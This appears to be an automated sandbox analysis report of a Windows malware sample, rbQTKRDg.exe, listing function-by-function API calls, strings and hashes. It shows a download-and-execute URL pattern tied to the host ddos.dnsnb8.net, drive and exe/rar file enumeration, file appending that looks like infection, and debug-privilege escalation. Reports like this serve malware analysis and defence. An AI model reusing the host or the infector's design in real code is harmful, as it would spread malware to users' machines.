Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-762681358
Opcode ID: fafdb338f5d3a8a4bc4a2ac3611ee3d0b290efa07bae68c98fea2c26eb14cbec
Instruction ID: 67e952af2c9f49f86e3115d12a5b26da9a4e5713ac91ec99c71e9f5bfdbdccee
Opcode Fuzzy Hash: fafdb338f5d3a8a4bc4a2ac3611ee3d0b290efa07bae68c98fea2c26eb14cbec
Instruction Fuzzy Hash: CF212775A0020CFADB209BB0DC49EBBBBB8FB55315F115096E600E2160DB749A98CF60

Function 008F1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 008F174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 008F177C
__aulldiv.LIBCMT ref: 008F1796
__aulldiv.LIBCMT ref: 008F17A8

Strings

SOFTWARE\GTplus, xrefs: 008F1742, 008F176B
Time, xrefs: 008F173D, 008F1766
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F1722

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-650092075
Opcode ID: 534c0934c389bd6989df8f2c24ad930339df3acfc72ad213c14be5b356d78415
Instruction ID: c3404f0dd8de6a714d7f946ed67ca4a3896d8f2ef327c4253759f07942496076
Opcode Fuzzy Hash: 534c0934c389bd6989df8f2c24ad930339df3acfc72ad213c14be5b356d78415
Instruction Fuzzy Hash: E8114CB2A0020DBBDF11AAB4C889FBF7BB8FB44B14F108115FA14E6284D6759A448B60

Function 008F6076 Relevance: 11.1, APIs: 7, Instructions: 616
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 008F60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008F60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 008F6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008F61A5

Memory Dump Source

Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 32148fd49a2519c3d23ccfb779ab17ddaa61ddf2870ae63f1eec30fcdaa90a80
Instruction ID: 41b97a08bbad1a3a6e8cb4433400587f332216a1d7c0dcee97996e71c1438ece
Opcode Fuzzy Hash: 32148fd49a2519c3d23ccfb779ab17ddaa61ddf2870ae63f1eec30fcdaa90a80
Instruction Fuzzy Hash: 841211725087898FDB328F34CC45BFA3BA0FF06310F1846ADDA85DB292E674A920C755

Function 008F2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008F2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 008F2BB4
GetDriveTypeA.KERNEL32(?), ref: 008F2BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 008F2BEE
lstrlen.KERNEL32(?), ref: 008F2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 008F2C16
CreateThread.KERNEL32(00000000,00000000,008F2845,00000000,00000000,00000000), ref: 008F2C3A

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 7e0da8c2929b9637a5c89ea8a3e8ecaab268f0559269eb8b2150bcb2281eac80
Instruction ID: 3000d8620538905cd3a4401c82c48f2944ec0d86715faa1255151fa0bb325a8b
Opcode Fuzzy Hash: 7e0da8c2929b9637a5c89ea8a3e8ecaab268f0559269eb8b2150bcb2281eac80
Instruction Fuzzy Hash: 2421D2B184015CEFEB209FB4AC84DBF7B6DFB44364B14012AFE92E2161D7248E06CB61

Function 008F1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,008F32B0,00000164,008F2986,?), ref: 008F1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 008F1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 008F1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 008F1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 008F1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 008F201E
memset.MSVCRT ref: 008F20D8
memset.MSVCRT ref: 008F20EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F2238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22DD
WriteFile.KERNEL32(000000FF,008F4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 008F2322
UnmapViewOfFile.KERNEL32(?,?,008F32B0,00000164,008F2986,?), ref: 008F2340
CloseHandle.KERNEL32(?,?,008F32B0,00000164,008F2986,?), ref: 008F234E
CloseHandle.KERNEL32(000000FF,?,008F32B0,00000164,008F2986,?), ref: 008F2359

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID:
API String ID: 3043204753-0
Opcode ID: c73f688889eda3f0d5b503b8f8305a1f257858f001a6d96e0046825788f978a2
Instruction ID: 48942b7892aaff6261b2a6905f361d253bce591a1eb4a8c75df940ae17d24177
Opcode Fuzzy Hash: c73f688889eda3f0d5b503b8f8305a1f257858f001a6d96e0046825788f978a2
Instruction Fuzzy Hash: 3CF114B1900609EFCB20DFB8D885ABDBBB5FF08314F10452AE619E66A1D734AD91CF54

Function 008F1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
Sleep.KERNEL32(00000064), ref: 008F19C6
wsprintfA.USER32 ref: 008F19EC
CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65
CloseHandle.KERNEL32(000000FF), ref: 008F1A90
DeleteFileA.KERNEL32(?), ref: 008F1AA7
VirtualFree.KERNEL32(008F4E60,00000000,00008000), ref: 008F1AC1

Strings

%s%.8X.data, xrefs: 008F19E6
2, xrefs: 008F19CF
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F197C
C:\Users\user\AppData\Local\Temp\, xrefs: 008F19DB

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
API String ID: 716042067-4219418977
Opcode ID: 960768b7494b0714de78479dd3345da261325d66076c8ce7f1573887e4d367d0
Instruction ID: 758d3dcf7a243b97aa02d0f29bafbda8b24c715a8b2285ee40df8ede648b189a
Opcode Fuzzy Hash: 960768b7494b0714de78479dd3345da261325d66076c8ce7f1573887e4d367d0
Instruction Fuzzy Hash: 5751187190122DEFCF109FA8DC88ABEBBB9FB04354F10456AE615E6190D7709E50CBA0

Function 008F28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008F28D3
wsprintfA.USER32 ref: 008F28F7
memset.MSVCRT ref: 008F2925
wsprintfA.USER32 ref: 008F2940

Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2A02
Part of subcall function 008F29E2: wsprintfA.USER32 ref: 008F2A1A
Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2A44
Part of subcall function 008F29E2: lstrlen.KERNEL32(?), ref: 008F2A54
Part of subcall function 008F29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 008F2A6C
Part of subcall function 008F29E2: strrchr.MSVCRT ref: 008F2A7C
Part of subcall function 008F29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 008F2A9F
Part of subcall function 008F29E2: lstrlen.KERNEL32(Documents and Settings), ref: 008F2AAE
Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2AC6
Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2ADA
Part of subcall function 008F29E2: FindFirstFileA.KERNEL32(?,?), ref: 008F2AEF
Part of subcall function 008F29E2: memset.MSVCRT ref: 008F2B13

strrchr.MSVCRT ref: 008F2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 008F2974

Strings

exe, xrefs: 008F296D
%s\, xrefs: 008F293A
%s%s, xrefs: 008F28F1
C:\Users\user\AppData\Local\Temp\, xrefs: 008F29B3
rar, xrefs: 008F2988

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1791786966
Opcode ID: a4efbe6f1fc79d37d02dc9ee8cf1a8be4f8d4e1e394cad93c7c65972c2f28882
Instruction ID: e04e9b4ca389bd83a20d916d9e4ecb9e978016ba33847280e642c83efa59f926
Opcode Fuzzy Hash: a4efbe6f1fc79d37d02dc9ee8cf1a8be4f8d4e1e394cad93c7c65972c2f28882
Instruction Fuzzy Hash: F9318172A4031D6BDB2097B4DC99FFA7B6CFB10314F040452F695E3181EAF49AC48BA1

Function 008F1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 008F164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 008F165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,00000104), ref: 008F166E
CreateThread.KERNEL32(00000000,00000000,008F1099,00000000,00000000,00000000), ref: 008F16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 008F16BD

Part of subcall function 008F139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F13BC
Part of subcall function 008F139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008F13DA
Part of subcall function 008F139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 008F1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F16E5

Strings

C:\Windows\system32, xrefs: 008F1656
C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F1662, 008F1667, 008F16DD
Documents and Settings, xrefs: 008F1696
C:\Users\user\AppData\Local\Temp\, xrefs: 008F1644

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-1811102148
Opcode ID: e9989ab8806afbab8af314e515014c1066de9002438eedf01c4affb7cf955536
Instruction ID: 2cdb13d9b6fc79f5bcbd215a736e7e0c1221f6243f115b434e15c0be895f93bf
Opcode Fuzzy Hash: e9989ab8806afbab8af314e515014c1066de9002438eedf01c4affb7cf955536
Instruction Fuzzy Hash: B9115E71541228FBDF206BB5AD4DEBB7E6DFB95761F200012F309D11A0DA758940CBA2

Function 008F1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 008F1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,008F10E8,?), ref: 008F108E

Strings

http://%s:%d/%s/%s, xrefs: 008F1000
ddos.dnsnb8.net, xrefs: 008F1026

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 2c0fed3a595871f2fc3d28147f25c817d97d4af1dc037bf9e8ad37b22646f01c
Instruction ID: ce397c9f64ae196af9c52be7fd07e361e1bbf7e18fb92530a21c43d583bb38ba
Opcode Fuzzy Hash: 2c0fed3a595871f2fc3d28147f25c817d97d4af1dc037bf9e8ad37b22646f01c
Instruction Fuzzy Hash: 2C011E7150065DBFE6206F709C88E3BBAACFB847A9F00452AB645E2590DA715E448B61

Function 008F2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008F2C57

Part of subcall function 008F1973: PathFileExistsA.SHLWAPI(008F4E5C,00000000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe), ref: 008F1992
Part of subcall function 008F1973: CreateFileA.KERNEL32(008F4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008F19BA
Part of subcall function 008F1973: Sleep.KERNEL32(00000064), ref: 008F19C6
Part of subcall function 008F1973: wsprintfA.USER32 ref: 008F19EC
Part of subcall function 008F1973: CopyFileA.KERNEL32(008F4E5C,?,00000000), ref: 008F1A00
Part of subcall function 008F1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F1A1E
Part of subcall function 008F1973: GetFileSize.KERNEL32(008F4E5C,00000000), ref: 008F1A2C
Part of subcall function 008F1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 008F1A46
Part of subcall function 008F1973: ReadFile.KERNEL32(008F4E5C,008F4E60,00000000,?,00000000), ref: 008F1A65

CreateThread.KERNEL32(00000000,00000000,008F2B8C,00000000,00000000,00000000), ref: 008F2C99
WaitForMultipleObjects.KERNEL32(00000001,008F16BA,00000001,000000FF,?,008F16BA,00000000), ref: 008F2CAC
VirtualFree.KERNEL32(009E0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,008F4E5C,008F4E60,?,008F16BA,00000000), ref: 008F2CC2

Strings

C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F2C69

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
API String ID: 2042498389-1600416215
Opcode ID: a0b2cfdf385dcc2b64e8efe7f439193283cb3c6762653bf35d97222fcc8fe2d8
Instruction ID: c88120924ba9bbf61d42fba58d83d96a869cd52b8dcddbae196fbf51ef8bb376
Opcode Fuzzy Hash: a0b2cfdf385dcc2b64e8efe7f439193283cb3c6762653bf35d97222fcc8fe2d8
Instruction Fuzzy Hash: 1F018FB27412287AD710ABB5DC0EEBF7E6CFF41B60F504116BB15D62C1EAA49A00C7E1

Function 008F14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 008F1504
VirtualQuery.KERNEL32(008F14E1,?,0000001C), ref: 008F1525
ExitProcess.KERNEL32 ref: 008F157A

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 3548df25b809cced42467fb0c83444ccec02b4c02bf88142d91e35923f016a54
Instruction ID: ba9a7f8dd8d6ae697f25e03b7405ad35610a8ef813a7d42eba762aba30e65c08
Opcode Fuzzy Hash: 3548df25b809cced42467fb0c83444ccec02b4c02bf88142d91e35923f016a54
Instruction Fuzzy Hash: 8B118E71900218EFCF20EFB5A898E7EB7BCFBD8750B20502BF602D2250E6348941DB51

Function 008F1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 008F1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 008F1947

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: f960042eb03934b0d3c1f4a2636e527c87ff9447b5559a3aca42e4420417d4d6
Instruction ID: 6dd7adbd19f9ca01a4549b4db0eca2cd62ef8ed5b5ac7e6ae959b0dffd2ee595
Opcode Fuzzy Hash: f960042eb03934b0d3c1f4a2636e527c87ff9447b5559a3aca42e4420417d4d6
Instruction Fuzzy Hash: B5F0313220060DEBDB209E36DC08AB77BACFB50365F408526F626D1050E770D645DAA0

Function 008F615D Relevance: 2.6, APIs: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008F60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 008F6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008F61A5

Memory Dump Source

Source File: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: f3b853330f06e08c96c0aa2a96476b0ca9794455877db9d96d9fd1a3723baffa
Instruction ID: f3468d1b471c5564f4034251f23d94832a47f3ceb781514ac62b1b51bfb3f4a0
Opcode Fuzzy Hash: f3b853330f06e08c96c0aa2a96476b0ca9794455877db9d96d9fd1a3723baffa
Instruction Fuzzy Hash: FD11513160065DCFCF318E68CC817ED37A1FF45305F684618DF49AB291EA7169A1CB94

Non-executed Functions

Function 008F119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe,?,?,?,?,?,?,008F13EF), ref: 008F11AB
OpenProcessToken.ADVAPI32(00000000,00000028,008F13EF,?,?,?,?,?,?,008F13EF), ref: 008F11BB
AdjustTokenPrivileges.ADVAPI32(008F13EF,00000000,?,00000010,00000000,00000000), ref: 008F11EB
CloseHandle.KERNEL32(008F13EF), ref: 008F11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,008F13EF), ref: 008F1203

Strings

C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe, xrefs: 008F11A5

Memory Dump Source

Source File: 00000001.00000002.2213053414.00000000008F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000001.00000002.2213037202.00000000008F0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213070626.00000000008F3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213086103.00000000008F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2213102978.00000000008F6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_8f0000_rbQTKRDg.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\rbQTKRDg.exe
API String ID: 75692138-1600416215
